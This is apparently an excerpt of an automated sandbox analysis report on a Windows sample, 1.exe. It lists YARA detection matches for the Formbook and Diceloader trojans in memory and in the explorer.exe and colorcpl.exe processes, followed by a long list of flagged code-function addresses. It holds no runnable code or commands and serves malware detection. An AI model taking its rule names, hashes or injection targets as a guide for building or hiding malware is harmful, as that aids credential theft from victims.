Source: 0.2.1.exe.3fbfe60.5.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.1.exe.3fbfe60.5.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.1.exe.4009280.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.1.exe.4009280.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.1.exe.4009280.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.2046232928.0000000001270000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000003.00000002.4456583793.00000000103B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000004.00000002.4449703704.0000000004C50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000004.00000002.4449219136.00000000030B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4449219136.00000000030B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.4449219136.00000000030B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.4456692490.00000000108B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000002.00000002.2045843901.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2045843901.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.2045843901.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.2021713062.0000000003E79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.2021713062.0000000003E79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.2021713062.0000000003E79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.2046258222.0000000001289000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000004.00000002.4449653470.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000004.00000002.4449610086.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4449610086.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.4449610086.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: 1.exe PID: 1892, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: 1.exe PID: 2136, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: colorcpl.exe PID: 3716, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Detected potential crypto function
Source: C:\Users\user\Desktop\1.exe Code function: 0_2_02C8C4D4 0_2_02C8C4D4
Source: C:\Users\user\Desktop\1.exe Code function: 0_2_02C8DC60 0_2_02C8DC60
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_00401030 2_2_00401030
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_00408C4B 2_2_00408C4B
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_00408C50 2_2_00408C50
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0041CD5A 2_2_0041CD5A
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0041C5E0 2_2_0041C5E0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_00402D90 2_2_00402D90
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_00402FB0 2_2_00402FB0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017B8158 2_2_017B8158
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017CA118 2_2_017CA118
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01720100 2_2_01720100
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017E81CC 2_2_017E81CC
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017F01AA 2_2_017F01AA
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017E41A2 2_2_017E41A2
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017C2000 2_2_017C2000
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017EA352 2_2_017EA352
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0173E3F0 2_2_0173E3F0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017F03E6 2_2_017F03E6
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017D0274 2_2_017D0274
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017B02C0 2_2_017B02C0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01730535 2_2_01730535
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017F0591 2_2_017F0591
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017E2446 2_2_017E2446
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017D4420 2_2_017D4420
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017DE4F6 2_2_017DE4F6
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01730770 2_2_01730770
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01754750 2_2_01754750
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0172C7C0 2_2_0172C7C0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0174C6E0 2_2_0174C6E0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01746962 2_2_01746962
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017329A0 2_2_017329A0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017FA9A6 2_2_017FA9A6
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0173A840 2_2_0173A840
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01732840 2_2_01732840
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0175E8F0 2_2_0175E8F0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017168B8 2_2_017168B8
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017EAB40 2_2_017EAB40
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017E6BD7 2_2_017E6BD7
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0172EA80 2_2_0172EA80
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017CCD1F 2_2_017CCD1F
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0173AD00 2_2_0173AD00
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0172ADE0 2_2_0172ADE0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01748DBF 2_2_01748DBF
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01730C00 2_2_01730C00
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01720CF2 2_2_01720CF2
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017D0CB5 2_2_017D0CB5
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017A4F40 2_2_017A4F40
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01750F30 2_2_01750F30
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017D2F30 2_2_017D2F30
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01772F28 2_2_01772F28
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0173CFE0 2_2_0173CFE0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01722FC8 2_2_01722FC8
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017AEFA0 2_2_017AEFA0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01730E59 2_2_01730E59
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017EEE26 2_2_017EEE26
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017EEEDB 2_2_017EEEDB
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01742E90 2_2_01742E90
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017ECE93 2_2_017ECE93
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0171F172 2_2_0171F172
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017FB16B 2_2_017FB16B
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0176516C 2_2_0176516C
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0173B1B0 2_2_0173B1B0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017E70E9 2_2_017E70E9
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017EF0E0 2_2_017EF0E0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017DF0CC 2_2_017DF0CC
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017370C0 2_2_017370C0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0171D34C 2_2_0171D34C
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017E132D 2_2_017E132D
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0177739A 2_2_0177739A
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017D12ED 2_2_017D12ED
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0174B2C0 2_2_0174B2C0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017352A0 2_2_017352A0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017E7571 2_2_017E7571
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017F95C3 2_2_017F95C3
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017CD5B0 2_2_017CD5B0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01721460 2_2_01721460
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017EF43F 2_2_017EF43F
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017EF7B0 2_2_017EF7B0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01775630 2_2_01775630
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017E16CC 2_2_017E16CC
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01739950 2_2_01739950
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0174B950 2_2_0174B950
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017C5910 2_2_017C5910
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0179D800 2_2_0179D800
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017338E0 2_2_017338E0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017EFB76 2_2_017EFB76
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017A5BF0 2_2_017A5BF0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0176DBF9 2_2_0176DBF9
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0174FB80 2_2_0174FB80
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017A3A6C 2_2_017A3A6C
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017EFA49 2_2_017EFA49
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017E7A46 2_2_017E7A46
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017DDAC6 2_2_017DDAC6
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017CDAAC 2_2_017CDAAC
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01775AA0 2_2_01775AA0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017D1AA3 2_2_017D1AA3
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017E7D73 2_2_017E7D73
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017E1D5A 2_2_017E1D5A
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01733D40 2_2_01733D40
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0174FDC0 2_2_0174FDC0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017A9C32 2_2_017A9C32
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017EFCF2 2_2_017EFCF2
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017EFF09 2_2_017EFF09
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_016F3FD5 2_2_016F3FD5
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_016F3FD2 2_2_016F3FD2
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017EFFB1 2_2_017EFFB1
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01731F92 2_2_01731F92
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01739EB0 2_2_01739EB0
Source: C:\Windows\explorer.exe Code function: 3_2_103EE062 3_2_103EE062
Source: C:\Windows\explorer.exe Code function: 3_2_103EC2FF 3_2_103EC2FF
Source: C:\Windows\explorer.exe Code function: 3_2_103E98F9 3_2_103E98F9
Source: C:\Windows\explorer.exe Code function: 3_2_103E9902 3_2_103E9902
Source: C:\Windows\explorer.exe Code function: 3_2_103EC302 3_2_103EC302
Source: C:\Windows\explorer.exe Code function: 3_2_103EA362 3_2_103EA362
Source: C:\Windows\explorer.exe Code function: 3_2_103F05B2 3_2_103F05B2
Source: C:\Windows\explorer.exe Code function: 3_2_103EF7C7 3_2_103EF7C7
Source: C:\Windows\explorer.exe Code function: 3_2_109782FF 3_2_109782FF
Source: C:\Windows\explorer.exe Code function: 3_2_109758F9 3_2_109758F9
Source: C:\Windows\explorer.exe Code function: 3_2_1097A062 3_2_1097A062
Source: C:\Windows\explorer.exe Code function: 3_2_1097C5B2 3_2_1097C5B2
Source: C:\Windows\explorer.exe Code function: 3_2_1097B7C7 3_2_1097B7C7
Source: C:\Windows\explorer.exe Code function: 3_2_10975902 3_2_10975902
Source: C:\Windows\explorer.exe Code function: 3_2_10978302 3_2_10978302
Source: C:\Windows\explorer.exe Code function: 3_2_10976362 3_2_10976362
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F0E4F6 4_2_04F0E4F6
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F12446 4_2_04F12446
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F04420 4_2_04F04420
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F20591 4_2_04F20591
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E60535 4_2_04E60535
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E7C6E0 4_2_04E7C6E0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E5C7C0 4_2_04E5C7C0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E60770 4_2_04E60770
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E84750 4_2_04E84750
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04EF2000 4_2_04EF2000
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F181CC 4_2_04F181CC
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F141A2 4_2_04F141A2
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F201AA 4_2_04F201AA
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04EE8158 4_2_04EE8158
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E50100 4_2_04E50100
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04EFA118 4_2_04EFA118
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04EE02C0 4_2_04EE02C0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F00274 4_2_04F00274
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F203E6 4_2_04F203E6
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E6E3F0 4_2_04E6E3F0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F1A352 4_2_04F1A352
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E50CF2 4_2_04E50CF2
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F00CB5 4_2_04F00CB5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E60C00 4_2_04E60C00
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E5ADE0 4_2_04E5ADE0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E78DBF 4_2_04E78DBF
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E6AD00 4_2_04E6AD00
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04EFCD1F 4_2_04EFCD1F
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F1EEDB 4_2_04F1EEDB
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F1CE93 4_2_04F1CE93
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E72E90 4_2_04E72E90
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E60E59 4_2_04E60E59
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F1EE26 4_2_04F1EE26
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E6CFE0 4_2_04E6CFE0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E52FC8 4_2_04E52FC8
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04EDEFA0 4_2_04EDEFA0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04ED4F40 4_2_04ED4F40
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F02F30 4_2_04F02F30
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04EA2F28 4_2_04EA2F28
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E80F30 4_2_04E80F30
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E8E8F0 4_2_04E8E8F0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E468B8 4_2_04E468B8
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E62840 4_2_04E62840
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E6A840 4_2_04E6A840
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E629A0 4_2_04E629A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F2A9A6 4_2_04F2A9A6
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E76962 4_2_04E76962
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E5EA80 4_2_04E5EA80
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F16BD7 4_2_04F16BD7
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F1AB40 4_2_04F1AB40
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04E51460 4_2_04E51460
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F1F43F 4_2_04F1F43F
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F295C3 4_2_04F295C3
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04EFD5B0 4_2_04EFD5B0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4_2_04F17571 4_2_04F17571
